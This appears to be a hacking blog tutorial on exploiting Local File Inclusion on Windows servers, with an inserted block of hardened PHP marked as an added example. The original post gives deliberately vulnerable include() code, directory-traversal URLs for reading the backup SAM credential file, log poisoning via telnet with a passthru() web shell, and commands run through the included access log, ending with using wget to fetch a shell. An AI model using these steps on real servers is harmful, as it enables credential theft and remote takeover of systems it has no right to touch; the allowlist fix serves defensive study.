Local File Inclusion LFI On Windows Server


In a previous post I showed you Local File Inclusion (LFI) on a Linux server; in this post I will show you how Local File Inclusion (LFI) works on a Windows server. I will not start with an introduction; for the complete guide, please refer to my old post.

What is a Local File Inclusion (LFI) vulnerability?

Local File Inclusion (LFI) is the process of including a local file available on the web server. This vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitized, an attacker can supply the locations of default files and access these sensitive files.

Here is the vulnerable code.

<?php
// Deliberately vulnerable: the 'page' GET parameter goes to include() unchecked.
if (isset($_GET['page'])) {
    include($_GET['page']);
}
?>

Here we can see that the script does not check which file is being included, so any file can be included by changing the value of the ‘page’ GET variable.
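A hardened form of the script above, as an added example that is not part of the original post: the request value is treated as a key in an allowlist, and the resolved path is then checked to sit inside the pages directory. The function name resolve_page, the pages directory, the page names and the temp-directory demo are assumptions made for illustration.

```php
<?php
// Added example, not from the original post. Directory and page names are assumptions.

// Map the request value to a file inside $pagesDir, or return null.
function resolve_page(string $requested, string $pagesDir, array $allowed): ?string
{
    // Layer 1: allowlist. The request value is a lookup key, never a path,
    // so "../", drive letters and log file names can never match.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // Layer 2: canonicalise and confirm the result is still inside $pagesDir
    // (catches symlinks/junctions and a careless allowlist entry).
    $base = realpath($pagesDir);
    $full = realpath($pagesDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// In view.php this would replace include($_GET['page']):
//   $file = resolve_page($_GET['page'] ?? 'contact', __DIR__ . '/pages', ['contact', 'about']);
//   if ($file === null) { http_response_code(404); exit; }
//   include $file;

// Offline demo on a constructed temp directory (run with: php demo.php).
if (PHP_SAPI === 'cli') {
    $root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . bin2hex(random_bytes(4));
    mkdir($root . DIRECTORY_SEPARATOR . 'pages', 0700, true);
    $pages = $root . DIRECTORY_SEPARATOR . 'pages';
    file_put_contents($pages . DIRECTORY_SEPARATOR . 'contact.php', 'contact page');
    file_put_contents($root . DIRECTORY_SEPARATOR . 'outside.php', 'not a page');

    // 'contact' is allowlisted; '../outside' is a deliberately bad allowlist
    // entry to show that layer 2 still rejects it.
    $allowed = ['contact', '../outside'];
    $inputs  = ['contact', 'contact.php', '../', '../../windows/repair/sam',
                '..\\..\\windows\\repair\\sam', '../logs/access.log', '../outside'];
    foreach ($inputs as $in) {
        $out = resolve_page($in, $pages, $allowed);
        printf("%-30s => %s\n", $in, $out === null ? 'rejected' : 'include ' . basename($out));
    }
    unlink($pages . DIRECTORY_SEPARATOR . 'contact.php');
    unlink($root . DIRECTORY_SEPARATOR . 'outside.php');
    rmdir($pages);
    rmdir($root);
}
```

Only the `contact` key resolves to a file; every other constructed input, including the bad allowlist entry, is rejected before include() is reached.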

Finding a Local File Inclusion (LFI) vulnerability in a website

Now we are going to look for a local file inclusion on a website. We have found a website, so let's check whether it is vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we get an error, so there is a good chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

On Linux we include /etc/passwd, but on a Windows server we include /windows/repair/sam; this repair/sam is a backup SAM file.

http://localhost/test.php?page=../../windows/repair/sam

If the file is not found, you will have to move up a directory by using ../

So, as you all know, in Local File Inclusion (LFI) an attacker can include sensitive files. Now let us shell the web server.

For this we will send an error to the web server's logs using PHP code.

<?php passthru($_GET['cmd']); ?>

You can also exploit this using the system(), exec(), shell_exec(), etc. functions. These functions are offered by PHP to execute system-level commands.

Here I am going to use telnet to inject malicious code as an error in the log files.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

This script is now saved on the web server, and we have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

Now you can do anything here after including the log file, and you can execute system-level commands, like:

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

So now you can wget the shell and download it onto the web server.

Hope you enjoyed this session and learned something. Thanks for reading, guys. Keep learning 😉

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...
